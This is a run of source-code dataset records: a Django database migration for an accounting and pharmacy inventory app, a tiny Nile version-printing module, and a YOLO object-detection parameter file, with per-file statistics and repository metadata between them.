('account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transaction_account', to='bmcore.Account')),
('account1', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cash_transfer_account', to='bmcore.Account')),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_acc_tran',
},
),
migrations.CreateModel(
name='Batch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=55, null=True)),
('bwd', models.BooleanField(default=True)),
('pack_conv', models.IntegerField(blank=True, null=True)),
('exp_month', models.IntegerField(blank=True, null=True)),
('exp_year', models.IntegerField(blank=True, null=True)),
('debit', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('credit', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('stock', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('mrp', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('p_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('p_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('s_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('s_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('tran', models.CharField(max_length=10)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('branch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='batch_branch', to='bmcore.Branch')),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_batch',
},
),
migrations.CreateModel(
name='BillWiseDetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('adj_ref', models.IntegerField(blank=True, null=True)),
('adj_id', models.IntegerField(blank=True, null=True)),
('ref_no', models.CharField(blank=True, max_length=25, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='billwisedetail_account', to='bmcore.Account')),
('tran', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='billwisedetails', to='bmcore.AccountTransaction')),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_acc_bwd',
},
),
migrations.CreateModel(
name='CashierCashDisplay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('checked', models.BooleanField(default=False)),
('viewed', models.BooleanField(default=False)),
('created_by', models.CharField(blank=True, max_length=50, null=True)),
('voucher_no', models.CharField(blank=True, max_length=10, null=True)),
('voucher_type', models.CharField(blank=True, max_length=30, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('branch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cashsale_batch', to='bmcore.Branch')),
('cashier', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cashsale_cashier', to='bmcore.Account')),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_cashier_cash_display',
},
),
migrations.CreateModel(
name='Composition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500)),
('val_name', models.CharField(blank=True, max_length=500, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_composition',
},
),
migrations.CreateModel(
name='CoreConf',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('particulars', models.CharField(max_length=100)),
('flag_1', models.BooleanField()),
],
options={
'db_table': 'tbl_core_conf',
},
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=55, null=True)),
('val_name', models.CharField(blank=True, max_length=55, null=True)),
('alias_name', models.CharField(blank=True, max_length=55, null=True)),
('print_name', models.CharField(blank=True, max_length=55, null=True)),
('door', models.CharField(blank=True, max_length=10, null=True)),
('street', models.CharField(blank=True, max_length=100, null=True)),
('station', models.CharField(blank=True, max_length=20, null=True)),
('district', models.CharField(blank=True, max_length=15, null=True)),
('state', models.CharField(blank=True, max_length=15, null=True)),
('telephone', models.CharField(blank=True, max_length=15, null=True)),
('mobile', models.CharField(blank=True, max_length=10, null=True)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('inv_req', models.CharField(blank=True, max_length=10, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_customer',
},
),
migrations.CreateModel(
name='Doctor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=55, null=True)),
('val_name', models.CharField(blank=True, max_length=55, null=True)),
('alias_name', models.CharField(blank=True, max_length=55, null=True)),
('register_no', models.CharField(blank=True, max_length=55, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_doctor',
},
),
migrations.CreateModel(
name='FinancialYear',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('fn_begin', models.DateField()),
('book_begin', models.DateField()),
('active', models.BooleanField(default=False)),
],
options={
'db_table': 'tbl_financial_year',
},
),
migrations.CreateModel(
name='Inventory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('val_name', models.CharField(blank=True, max_length=100, null=True)),
('alias_name', models.CharField(blank=True, max_length=100, null=True)),
('bwd', models.BooleanField(default=True)),
('schedule_h', models.BooleanField(default=False)),
('schedule_h1', models.BooleanField(default=False)),
('narcotic', models.BooleanField(default=False)),
('for_order', models.BooleanField(default=True)),
('prohibited', models.BooleanField(default=False)),
('hide', models.BooleanField(default=False)),
('min_order_lvl', models.IntegerField(default=0)),
('max_order_lvl', models.IntegerField(default=0)),
('re_order_lvl', models.IntegerField(default=0)),
('range_order_lvl', models.IntegerField(default=0)),
('s_disc', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('migration_id', models.IntegerField(blank=True, null=True)),
('migration_name', models.CharField(blank=True, max_length=100, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('composition', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Composition')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_inventory',
},
),
migrations.CreateModel(
name='InventoryTransaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('batch_value', models.CharField(blank=True, max_length=20, null=True)),
('qty', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('free', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('p_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('p_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('supp_profit_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('disc', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('disc_value', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('mrp', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('s_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('s_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('tax_value', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('amount_value', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('cl', models.BooleanField(default=True)),
('ol', models.BooleanField(default=False)),
('inward', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('outward', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('pack_conv', models.IntegerField(blank=True, null=True)),
('exp_month', models.IntegerField(blank=True, null=True)),
('exp_year', models.IntegerField(blank=True, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('batch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inventory_transaction_batch', to='bmcore.Batch')),
('inventory', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Inventory')),
],
options={
'db_table': 'tbl_inv_tran',
},
),
migrations.CreateModel(
name='Manufacturer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('val_name', models.CharField(blank=True, max_length=100, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_manufacturer',
},
),
migrations.CreateModel(
name='Pack',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=10, null=True)),
('val_name', models.CharField(blank=True, max_length=10, null=True)),
('print_name', models.CharField(blank=True, max_length=11, null=True)),
('conversion', models.IntegerField(blank=True, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_pack',
},
),
migrations.CreateModel(
name='Pending',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ref_no', models.CharField(blank=True, max_length=40, null=True)),
('bill_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('adjusted', models.DecimalField(decimal_places=2, max_digits=20)),
('adj_id', models.IntegerField()),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pending_account', to='bmcore.Account')),
('branch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pending_branch', to='bmcore.Branch')),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_acc_pending',
},
),
migrations.CreateModel(
name='Rack',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=10)),
('val_name', models.CharField(blank=True, max_length=10, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_rack',
},
),
migrations.CreateModel(
name='Salt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('val_name', models.CharField(blank=True, max_length=50, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_salt',
},
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('val_name', models.CharField(blank=True, max_length=20, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_section',
},
),
migrations.CreateModel(
name='Tax',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=40)),
('val_name', models.CharField(blank=True, max_length=40, null=True)),
('tax_type', models.CharField(max_length=40)),
('sgst_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('cgst_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('igst_ratio', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_tax',
},
),
migrations.CreateModel(
name='Therapy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=60)),
('val_name', models.CharField(blank=True, max_length=60, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_therapy',
},
),
migrations.CreateModel(
name='Voucher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('trans_date', models.DateField(blank=True, null=True)),
('value_date', models.DateField(blank=True, null=True)),
('rounded', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('discount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('voucher_no', models.CharField(blank=True, max_length=10, null=True)),
('voucher_type', models.CharField(blank=True, max_length=30, null=True)),
('ref_no', models.CharField(blank=True, max_length=10, null=True)),
('narration', models.CharField(blank=True, max_length=100, null=True)),
('voucher_model', models.IntegerField(blank=True, null=True)),
('tax_exempt', models.BooleanField(default=False)),
('tran', models.CharField(blank=True, max_length=50, null=True)),
('batch', models.CharField(blank=True, max_length=50, null=True)),
('status', models.BooleanField(default=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('account1', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_account1', to='bmcore.Account')),
('account2', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_account2', to='bmcore.Account')),
('branch', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Branch')),
('cashier', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_cashier', to='bmcore.Account')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_customer', to='bmcore.Customer')),
('doctor', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='voucher_doctor', to='bmcore.Doctor')),
('op_account', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Account')),
('op_inventory', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Inventory')),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_voucher',
},
),
migrations.CreateModel(
name='VoucherModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=45)),
('prefix', models.CharField(blank=True, max_length=8, null=True)),
('suffix', models.CharField(blank=True, max_length=8, null=True)),
('vch_no', models.IntegerField(blank=True, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_vch',
},
),
migrations.CreateModel(
name='VoucherTemplate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=45)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_vch_tpl',
},
),
migrations.CreateModel(
name='VoucherType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=45)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-timestamp', '-updated'],
'db_table': 'tbl_vch_type',
},
),
migrations.AddField(
model_name='vouchertemplate',
name='voucher_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bmcore.VoucherType'),
),
migrations.AddField(
model_name='vouchermodel',
name='voucher_template',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='voucher_model_voucher_template', to='bmcore.VoucherTemplate'),
),
migrations.AddField(
model_name='inventorytransaction',
name='pack',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Pack'),
),
migrations.AddField(
model_name='inventorytransaction',
name='tax',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Tax'),
),
migrations.AddField(
model_name='inventorytransaction',
name='voucher',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inventory_transactions', to='bmcore.Voucher'),
),
migrations.AddField(
model_name='inventory',
name='manufacturer',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Manufacturer'),
),
migrations.AddField(
model_name='inventory',
name='rack',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Rack'),
),
migrations.AddField(
model_name='inventory',
name='section',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Section'),
),
migrations.AddField(
model_name='inventory',
name='tax',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Tax'),
),
migrations.AddField(
model_name='inventory',
name='therapy',
field=models.ManyToManyField(blank=True, to='bmcore.Therapy'),
),
migrations.AddField(
model_name='composition',
name='salt',
field=models.ManyToManyField(blank=True, to='bmcore.Salt'),
),
migrations.AddField(
model_name='cashiercashdisplay',
name='voucher',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cashsale_voucher', to='bmcore.Voucher'),
),
migrations.AddField(
model_name='batch',
name='inventory',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Inventory'),
),
migrations.AddField(
model_name='batch',
name='pack',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bmcore.Pack'),
),
migrations.AddField(
model_name='accounttransaction',
name='voucher',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='account_transactions', to='bmcore.Voucher'),
),
]
| 57.974724 | 176 | 0.581612 | 3,760 | 36,698 | 5.497872 | 0.060904 | 0.057904 | 0.030186 | 0.045279 | 0.836784 | 0.826093 | 0.789716 | 0.765045 | 0.747049 | 0.69969 | 0 | 0.014039 | 0.270205 | 36,698 | 632 | 177 | 58.066456 | 0.757822 | 0.001853 | 0 | 0.5888 | 1 | 0 | 0.129331 | 0.006553 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0064 | 0 | 0.0112 | 0.0032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37f2a7323721fe5dde502fa1a5d8ca25b345ede2 | 153 | py | Python | src/nile/core/version.py | kootsZhin/nile | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | [
"MIT"
] | 121 | 2021-10-30T08:42:44.000Z | 2022-03-31T13:17:58.000Z | src/nile/core/version.py | kootsZhin/nile | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | [
"MIT"
] | 56 | 2021-10-31T16:45:06.000Z | 2022-03-31T04:41:08.000Z | src/nile/core/version.py | kootsZhin/nile | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | [
"MIT"
] | 22 | 2021-11-18T11:24:56.000Z | 2022-03-30T08:15:18.000Z | """Command to print Nile version."""
from nile import __version__ as nile_version
def version():
"""Print Nile version."""
print(nile_version)
| 19.125 | 44 | 0.699346 | 20 | 153 | 5.05 | 0.45 | 0.435644 | 0.475248 | 0.455446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 153 | 7 | 45 | 21.857143 | 0.801587 | 0.326797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
5307f07f91db7c56862f7590b68b346f6ff0bc4f | 8,881 | py | Python | detection/app_params.py | ckyrkou/Keras_Object_Detection | 3aa84632b3454f1440498e424133437d2c242e2d | [
"MIT"
] | null | null | null | detection/app_params.py | ckyrkou/Keras_Object_Detection | 3aa84632b3454f1440498e424133437d2c242e2d | [
"MIT"
] | null | null | null | detection/app_params.py | ckyrkou/Keras_Object_Detection | 3aa84632b3454f1440498e424133437d2c242e2d | [
"MIT"
] | null | null | null | # __
# / *_)
# _.----. _ /../
# /............./
# __/..(...|.(...|
# /__.-|_|--|_|
#
# Christos Kyrkou, PhD
# 2019
from .utils import yolo_params
import numpy as np
import pickle
def get_app_params(app, batch_size):
annformat = 'pascalvoc'
if (app == 'pets_2009'):
COLORS = [(128, 128, 0)]
LABELS = ['ped']
NORM_H, NORM_W = 320, 320
GRID_H, GRID_W = 10, 10
N_GRID_H, N_GRID_W = int(NORM_H / GRID_H), int(NORM_W / GRID_W)
ANCHORS = np.array([1.05,1.86, 3.14,4.51, 4.18,9.73, 8.51,9.36, 13.49,13.02])*24/320 # VOC
BOX = int(len(ANCHORS) / 2)
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
FILTER_YOLO = (CLASS + 5) * BOX
FILTER_SSD = (CLASS + 1+4) * BOX
THRESHOLD = 0.5
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.0, 0.0, 0.0, 0.0
NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 1., 1.0, 1.0, 1.0
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.05, 2.0, 1.0, 2.0
TRUE_BOX_BUFFER = 100
WARMUP_BATCHES = 0
DET_TYPE = 'YOLO'
ann_dir = './data/JPG_VOC/'
#ann_dir = './Annotations/JPG_VOC/train/'
#val_ann_dir = './Annotations/JPG_VOC/val/'
img_dir = './dataset/JPG_VOC/'
#img_dir = './dataset/JPG_VOC/train/'
#val_img_dir = './dataset/JPG_VOC/val/'
if (app == 'pennfudan'):
COLORS = [(128, 128, 0)]
LABELS = ['ped']
NORM_H, NORM_W = 320, 320
GRID_H, GRID_W = 10, 10
N_GRID_H, N_GRID_W = int(NORM_H / GRID_H), int(NORM_W / GRID_W)
ANCHORS = np.array([1.05,1.86, 3.14,4.51, 4.18,9.73, 8.51,9.36, 13.49,13.02])*24/320 # VOC
BOX = int(len(ANCHORS) / 2)
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
FILTER_YOLO = (CLASS + 5) * BOX
FILTER_SSD = (CLASS + 1+4) * BOX
THRESHOLD = 0.5
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.0, 0.0, 0.0, 0.0
NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.1, 1.0, 5.0, 1.0
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.05, 2.0, 1.0, 2.0
TRUE_BOX_BUFFER = 100
WARMUP_BATCHES = 0
DET_TYPE = 'YOLO'
ann_dir = './data/JPG_VOC/'
#ann_dir = './Annotations/JPG_VOC/train/'
#val_ann_dir = './Annotations/JPG_VOC/val/'
img_dir = './dataset/JPG_VOC/'
#img_dir = './dataset/JPG_VOC/train/'
#val_img_dir = './dataset/JPG_VOC/val/'
if (app == 'voc_2012_det'):
COLORS = [(128, 0, 0), (0, 128, 0), (128, 128, 0),
(0, 0, 128), (128, 0, 128), (0, 128, 128), (128, 128, 128),
(64, 0, 0), (192, 0, 0), (64, 128, 0), (192, 128, 0),
(64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
(0, 64, 0), (128, 64, 0), (0, 192, 0), (128, 192, 0),
(0, 64, 128)]
LABELS = ['aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person',
'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
NORM_H, NORM_W = 416, 416
GRID_H, GRID_W = 13, 13
N_GRID_H, N_GRID_W = int(NORM_H / GRID_H), int(NORM_W / GRID_W)
ANCHORS = np.array([1.05,1.86, 3.14,4.51, 4.18,9.73, 8.51,9.36, 13.49,13.02])*(22/320) # VOC
BOX = int(len(ANCHORS) / 2)
BOX = int(len(ANCHORS) / 2)
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
FILTER_YOLO = (CLASS + 5) * BOX
FILTER_SSD = (CLASS + 1+4) * BOX
THRESHOLD = 0.5
NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 1., 1.0, 5.0, 1.0
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.05, 2.0, 1.0, 2.0
TRUE_BOX_BUFFER = 100
WARMUP_BATCHES = 0
DET_TYPE = 'YOLO'
ann_dir = './data/JPG_VOC/'
#ann_dir = './Annotations/JPG_VOC/train/'
#val_ann_dir = './Annotations/JPG_VOC/val/'
img_dir = './dataset/JPG_VOC/'
#img_dir = './dataset/JPG_VOC/train/'
#val_img_dir = './dataset/JPG_VOC/val/'
if (app == 'vedai'):
COLORS = [(128, 0, 0), (0, 128, 0), (128, 128, 0),
(0, 0, 128), (128, 0, 128), (0, 128, 128), (128, 128, 128),
(64, 0, 0), (192, 0, 0), (64, 128, 0), (192, 128, 0),
(64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
(0, 64, 0), (128, 64, 0), (0, 192, 0), (128, 192, 0),
(0, 64, 128)]
LABELS = ['car']
NORM_H, NORM_W = 512, 512
GRID_H, GRID_W = 16, 16
N_GRID_H, N_GRID_W = int(NORM_H / GRID_H), int(NORM_W / GRID_W)
ANCHORS = np.array([1.05,1.86, 3.14,4.51, 4.18,9.73, 8.51,9.36, 13.49,13.02])*(22/320) # VOC
BOX = int(len(ANCHORS) / 2)
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
FILTER_YOLO = (CLASS + 5) * BOX
FILTER_SSD = (CLASS + 1+4) * BOX
THRESHOLD = 0.5
NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.5, 1.0, 5.0, 1.0
#NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = 0.05, 2.0, 1.0, 2.0
TRUE_BOX_BUFFER = 100
WARMUP_BATCHES = 0
DET_TYPE = 'YOLO'
ann_dir = './data/JPG_VOC/'
#ann_dir = './Annotations/JPG_VOC/train/'
#val_ann_dir = './Annotations/JPG_VOC/val/'
img_dir = './dataset/JPG_VOC/'
#img_dir = './dataset/JPG_VOC/train/'
#val_img_dir = './dataset/JPG_VOC/val/'
